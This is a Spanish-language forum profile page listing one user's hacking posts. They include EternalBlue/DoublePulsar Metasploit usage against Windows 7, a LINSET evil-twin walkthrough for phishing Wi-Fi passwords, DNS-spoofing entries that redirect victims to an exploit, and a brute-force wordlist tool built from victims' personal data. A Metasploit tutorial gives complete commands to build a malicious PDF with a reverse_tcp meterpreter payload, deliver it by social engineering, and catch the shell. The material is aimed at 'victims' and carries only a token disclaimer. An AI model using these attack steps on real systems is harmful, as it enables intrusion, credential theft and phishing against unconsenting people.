elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Temas
Páginas: [1] 2 3
1  Programación / Scripting / Permuter, una herramienta para crear una lista de contraseñas certera en: 27 Julio 2017, 10:19 am
Hola, escribí en python una herramienta que te permite crear contraseñas para ataques de fuerza bruta utilizando datos personales de la victima, con lo que en gran medida aumenta el porcentaje de acierto. Funciona permutando cadenas para crear las distintas combinaciones sin repetirlas. Esta herramienta esta en su primera version, cualquier fallo que detecten o mejora que quieran sugerir estoy abierto a oirlos. Aquí les dejo el link. 

https://github.com/Grillet0xEB/permuter
2  Seguridad Informática / Bugs y Exploits / Vulnerar Windows 7 con Eternalblue & Doublepulsar en: 17 Junio 2017, 02:50 am
Un grupo de Hackers llamados ShadowsBrokers logró filtrar unas herramientas privadas utilizadas por la NSA para explotar la vulnerabilidad ms17_010 del servicio SMB de Windows 7. Estas herramientas lo que nos permiten es la carga y ejecución directa de un payload en la victima, es decir una intrusión directa.

Veremos cómo instalar Eternalblue & Doublepulsar en Metasploit y usarlo

1- Lo primero que tenemos que hacer es descargar o clonar las herramientas desde GitHub en el siguiente Link https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit



2- Entramos en el directorio que se nos crea, y copiamos el archivo eternalblue_doublepulsa.rb a la carpeta de exploits para SMB de Windows



3- Por ultimo ejecutamos Metasploit y buscamos el exploit




Para usarlo debemos configurar:

RHOST - IP de la victima
PROCESSINJECT - Proceso al que inyectaremos el ataque
TARGETARCHITECTURE - Arquitectura de la víctima x86 o x64

Luego lo corremos y entramos directamente al sistema.





· Imagenes ajustadas a las reglas del foro
>aquí las reglas del foro
-Engel Lex
3  Seguridad Informática / Hacking / Como le digo a Hydra cual es el failed login? en: 28 Enero 2017, 21:16 pm
Como escribo en Hydra que el failed login de la pagina es la apertura de una pagina en esa misma pestaña mostrando un alert() de JS diciendo "Usuario o Clave incorrecto, intente de nuevo" y cuando se da clic en aceptar vuelve otra vez a la pagina del login
4  Seguridad Informática / Hacking / Canales de Youtube sobre hacking en: 27 Enero 2017, 13:05 pm
Para los que son nuevos en el tema de seguridad informática o tienen algo de experiencia y quieran aprender un poco más, estos canales de Hacking serán de ayuda. Mientras más aprendas y entiendas, mejor hacker serás.

Luis Cambero           https://www.youtube.com/channel/UCI-PmHB2P6tUjFOzpFd8gjA
OHCS                      https://www.youtube.com/channel/UCZy5dMsXtqVP2XXqfGqvxBQ
uservkz80                https://www.youtube.com/channel/UCKOF5FGpvehulFOZkkxTWuw
Gear Capitan            https://www.youtube.com/channel/UCV_3zqhjU4Q8DeZD9MyjB7A
Team Whoami           https://www.youtube.com/channel/UCctksD8NRnakbDq6nyeTr_A
Hacking Etico Leon    https://www.youtube.com/channel/UCZAsbt5v32L4oZ2hxK2v4Zw
Hydrogen                 https://www.youtube.com/channel/UCO0HCBsQRc6sjD8s7OU0ypw
Metasplotation          https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg
DedSec                   https://www.youtube.com/channel/UCx34ZZW2KgezfUPPeL6m8Dw

5  Seguridad Informática / Hacking / Analizar paquetes de datos de WhatsApp en una LAN con Wireshark en: 20 Septiembre 2016, 03:59 am
Hola amigos, tengo una DUDA, como puedo ver los paquetes de datos enviados y recibidos por WhatsApp en una LAN con Wireshark?
6  Seguridad Informática / Hacking Wireless / Auditoria a redes Wi-Fi cercanas con Ingeniería Social en: 1 Junio 2016, 07:39 am
Hola! Hoy les voy a mostrar como realizar un ataque de ingeniería social a una red Wi-Fi con la herramienta LINSET que ya viene incluida en la distribución Wifislax, distribución que utilizaremos para realizar la auditoria.

Acá les dejo un video de como instalar LINSET en KaliLinux



Aquí esta el enlace a GitHub https://github.com/vk496/linset




Empecemos con una pequeña introducción a lo que es Wifislax

Wifislax es un sistema operativo basado en sistemas GNU/Linux diseñado para la auditoria de redes, que incluye un abanico de herramientas enfocadas al uso de redes. Acá les dejo la pagina oficial de Wifislax
http://www.wifislax.com/ donde pueden encontrar mas información y bajar la ultima versión del sistema operativo.

Ahora, que vamos a hacer con LINSET?

Lo que vamos a hacer es crear una red Wi-Fi (FakeAP) con el mismo nombre de la que vamos a auditar, luego haremos que los usuarios no se puedan conectar a la red real de modo que tengan que conectarse a la nuestra, una vez en nuestra red cuando intenten navegar les saldrá un "Mensaje de seguridad" pidiéndole al usuario que "Por razones de seguridad introduzca su contraseña WPA", luego LINSET verificara la contraseña con la red real, si no es correcta dirá que lo vuelva a intentar, de serlo se cierra nuestra red creada y nos da la contraseña. Esta auditoria es mas rápida cuando la red tiene varios usuarios conectados.


Comencemos.

1.)En el sistema operativo que estemos abrimos una consola y escribimos
Código:
linset
para ejecutar la aplicación.

2.)Lo primero que hará sera verificar que todas las herramientas que el usa están instaladas correctamente, si una de ellas no esta instalada no deja correr la aplicación

3.)Nos pedirá escoger la interfaz con la que queremos hacer la auditoria
Citar
Se recomienda utilizar una interfaz de largo alcance para que el ataque sea un poco mas rápido y los usuarios la detecten con mas intensidad

4.)Luego nos pedirá escoger el o los canales que queremos escanear, yo siempre escojo la opción 1, escanear todos los canales. Nos saldrá una nueva ventana en las que aparecerán las redes inalambricas al alcance, cuando aparezca la red a la que vamos a auditar presionamos Ctrl+C

5.)Nos pedirá escoger cual red queremos clonar. Si notan a algunas redes les aparece un "*" al lado del numero de la red, eso significa que esa red tiene al menos 2 o 3 usuarios conectados, se busca que la red que queremos auditar tenga el "*" y el mayor PWR posible, luego seleccionamos la red

6.)Escogemos el modo de FakeAP que queremos utilizar, la opción 1 es la recomendada

7.)Nos pedirá escoger la forma en la que queremos capturar el HandShake, la opción mas rápida es la 1. Lo que hace es realizar una desconeccion masiva al objetivo. Aparecerá una ventana en la que se muestran los usuarios conectados, si arriba a la derecha no se muestra el HandShake cerramos la ventana y en LINSET le damos la opción 2 para realizar el ataque de nuevo

8.)Una vez obtenido el HandShake en LINSET le damos a la primera opción para confirmar que lo obtuvimos, luego seleccionamos el tipo de interfaz web, le damos a la opción 1

9.)Seleccionamos el idioma de la pagina que va a crear LINSET, español en nuestro caso

10.)Nos aparecerán varias ventanas, una para el AP, otra para el servidor DHCP, otra para el FkeDNS, otra para desconectar a los usuarios y la ultima para ver los usuarios que se conectan a nuestra red

11.)Una vez obtenida la contraseña saldrá una ventana con la contraseña, se desconectara nuestro FakeAP y LINSET se cerrara.




Espero que este post les haya servido de ayuda y lo hayan entendido. A falta de imágenes espero haber dado una explicación detallada.
7  Seguridad Informática / Hacking / Que puedo hacer con la clave de admin de una pc con windows desde otra pc? en: 31 Mayo 2016, 05:41 am
He conseguido con la herramienta LaZagne sacar las claves de usuario en Windows, entre esas esta la de administrador. Quisiera saber básicamente como usar psexec o cualquier otra herramienta para obtener acceso a una shell de cualquier tipo, ya sea msDOS o meterpreter. la maquina victima usa Windows 8.1

LaZagne en GitHub para el que este interesado
https://github.com/AlessandroZ/LaZagne
8  Seguridad Informática / Hacking / [AYUDA] Esto funcionaria ? en: 17 Abril 2014, 07:35 am
uso el exploit ms11_040_netapi para internet explore, ese exploit me genera la direccion de enlace que seria por ejemplo http://192.168.1.10:8080/kjhTFC8o9 para yo tener acceso a la pc remota, el tiene que poner esa direccion en su internet explorer.

pero..... si yo hago un dns spoofing con ettercap de la siguiente manera:

Código:
google.com        A        http://192.168.1.10:8080/kjhTFC8o9
*.google.com      A        http://192.168.1.10:8080/kjhTFC8o9
www.google.com    PTR    http://192.168.1.10:8080/kjhTFC8o9

la victima cuando vaya a entrar a google entrara a mi link y me regala una linda sesión de meterpreter ?????
9  Seguridad Informática / Hacking / Dudas sobre armitage, vulnerabilidades y linux en: 17 Abril 2014, 06:59 am
A ver tengo un par de dudas sobre unas cosillas.

     tengo una pc que usa linux (Debian), quise entrar a ella usando armitage pero me di cuenta de que solo esta corriendo un servivio que es http en el puerto 80, como puedo entrar a ella ? usando hackin avanzado porque de manera basica ya se

    de forma etica como podria desde armitaje entrar a una pc que usa windows 7 u 8 sin usar el exploit ms11_040_netapi de internet explorer, que exploit explota una vulnerabilidad comun en win 7?



   
10  Seguridad Informática / Hacking / Explotando Windows 7 o XP mediante PDF desde metasploit en: 6 Abril 2014, 05:39 am
El siguiente post es solo con fines EDUCATIVOS, cualquier uso malintencionado del mismo es responsabilidad entera de cada uno.

En la actualidad como mucho de nosotros sabemos, la mayoría de las personas optan por usar el famosillo Sistema Operativo Windows, ya sea XP - 7 o la nueva que se lanzo hace poco el Windows 8, entonces es lógico que si usan Windows es por cosas de trabajo, estudio, diversión  etc.

También es de conocimiento que Windows actualmente es vulnerable a cualquier ataque cibernetico, ya sea mediante exploits, vulnerabilidades, troyanos, etc, es por ello que muchos preferimos usar cualquier otro sistema que no sea Windows.

Pero ustedes se preguntaran ¿Porque Windows es tan Vulnerable?... Pues, porque nosotros mismos lo hacemos vulnerable!!! entonces ustedes dirán !Joder que Coña! si mis Firewall, Antivirus están actualizados! ... pues eso no tiene nada que ver, porque el sistema es explotado mediante las vulnerabilidades que tienen los programas que acostumbran a instalar diariamente, por ejemplo el  Adobe PDF, Microsoft Word, Ares, Reproductor de Windows, Winamp, VLC u otros, ¿Por que creen que las empresas actualizan sus Softwares (programas que usamos) semanalmente?... Porque, no es porque les guste... es con el fin de parchear las vulnerabilidades que se presentan diariamente en estos programas, y así "ayudan" a que el sistema sea un poco "seguro".


En este tutorial voy a demostrar como aprovecharnos de las vulnerabilidades que se presentan en los programas que tienen instalado un Sistema Operativo Windows 7 o XP, para asi tener el control total del sistema.

Para tal caso utilizare la vulnerabilidad Adobe PDF Escape EXE Social Engineering (No javascript) ya que casi el 95% (quizá) de los usuarios de Windows tienen instalado el Adobe Acrobat ya sea en su ordenador o notebook.

REQUERIMIENTOS:

    Backtrack 5 R1 - R2 o R3 (Atacante)
    Metasploit Framework (Atacante)
    Windows XP - 7 (Victima)
    Adobe Reader 9.1 (Victima)



PROCEDIMIENTOS:

Lo primero que tenemos que hacer es crear el PDF malicioso desde el Metasploit, dicho archivo sera enviado a nuestra victima usando Ing. Social para que logre abrirlo y así obtener acceso a su sistema.

Abrimos el Metasploit y tecleamos los siguientes comandos:

Código:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs (Usar adobe pdf embedded exe exploit)
set payload windows/meterpreter/reverse_tcp                 (Payload que devolvera un Meterpreter)
set filename Important_Meeting_Notice.pdf                         (Creara el archivo PDF malicioso)
set lhost 192.168.1.17                                                         (IP del Atacante)
set lport 8080                                                                       (Puerto open de la Victima)
exploit



Después de haber generado el PDF malicioso con los comandos mencionados, se almacenera en la carpeta /root/.msf4/local/ si no logras ver la carpeta /.msf4/ teclea Ctrl+H y observeras dicha carpeta.

El siguiente paso es enviar el PDF malicioso generado a nuestra victima, ya sea por e-mail, link de descarga u otros métodos que se nos pueda ocurrir (Ing. Social).

Si logramos que nuestra victima acepte dicho archivo, inmediatamente abrimos nuevamente el Metasploit en otra consola para generar la conexión que recibiremos cuando la victima ejecute el PDF, ejecutando los siguientes comandos:

Código:
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lport 8080
set lhost 192.168.1.17 
exploit



Cuando la victima ejecuta el PDF malicioso, Adobe Acrobat le mostrara un mensaje preguntándole si desea ejecutar el archivo, como indica la siguiente imagen:



Después de que la victima haga clic en "Abrir" automáticamente recibiremos la conexión inversa en nuestra consola del Metasploit, tal cual se muestra en la siguiente imagen:



listo ahora solo escribimos help y vemos los comandos que podemos ejecutar

Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines